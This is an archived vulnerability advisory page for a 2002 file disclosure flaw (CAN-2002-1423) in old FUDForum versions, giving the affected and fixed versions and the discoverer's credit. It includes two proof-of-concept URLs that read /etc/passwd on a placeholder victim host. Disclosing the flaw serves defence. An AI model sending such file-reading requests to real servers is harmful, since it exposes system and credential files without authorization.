exploits , vulnerabilities , articles , Ilia Alshanetsky FUDForum File Disclosure Vulnerability

Title	Ilia Alshanetsky FUDForum File Disclosure Vulnerability
Published	2002-08-19-12:00AM
Updated	2002-08-19-10:39PM
Class	Design Error
CVE	CAN-2002-1423
Remote	Yes
Local	No
Credit	Discovery credited to Ulf Harnhammar <ulfh@update.uu.se>.
Vulnerable	Ilia Alshanetsky FUDForum 2.0.2 Ilia Alshanetsky FUDForum 1.9.8 Ilia Alshanetsky FUDForum 1.2.8
Not Vulnerable	Ilia Alshanetsky FUDForum 2.2.3 Ilia Alshanetsky FUDForum 2.2 .0
Code	There is no exploit code required. The following proof of concept was provided by Ulf Harnhammar <ulfh@update.uu.se>: http://victimhost.com/tmp_view.php?file=/etc/passwd http://victimhost.com/admbrowse.php?down=1&cur=%2Fetc%2F&dest=passwd&rid=1&S=[someid]
TXT

Vulnerabilities - newest 10 RSS | More

• 2008-11-21 SocialEngine HTTP Response Splitting and SQL-injection Vulnerabilities
• 2008-11-21 Oracle Database Vault Privilege Escalation Vulnerability
• 2008-11-20 GeSHi XML Parsing Remote Denial Of Service Vulnerability
• 2008-11-20 Softbiz Classifieds Script Cross Site Scripting Vulnerability
• 2008-11-20 P3nfs Insecure Temporary File Creation Vulnerability
• 2008-11-20 Easyedit Multiple SQL Injection Vulnerabilities
• 2008-11-20 SystemImager Insecure Temporary File Creation Vulnerabilities
• 2008-11-20 Yasna Yazd Discussion Forum Multiple Cross-Site Scripting Vulnerabilities
• 2008-11-20 phpBLASTER CMS Multiple Local File Include Vulnerabilities
• 2008-11-19 Symantec Backup Exec Data Management Protocol Buffer Overflow Vulnerability

• Vulnerabilities
• Exploits
• News
• Articles

Copyright 2007, SecurityDot
Fri, 21 Nov 2008 06:05:57 +0000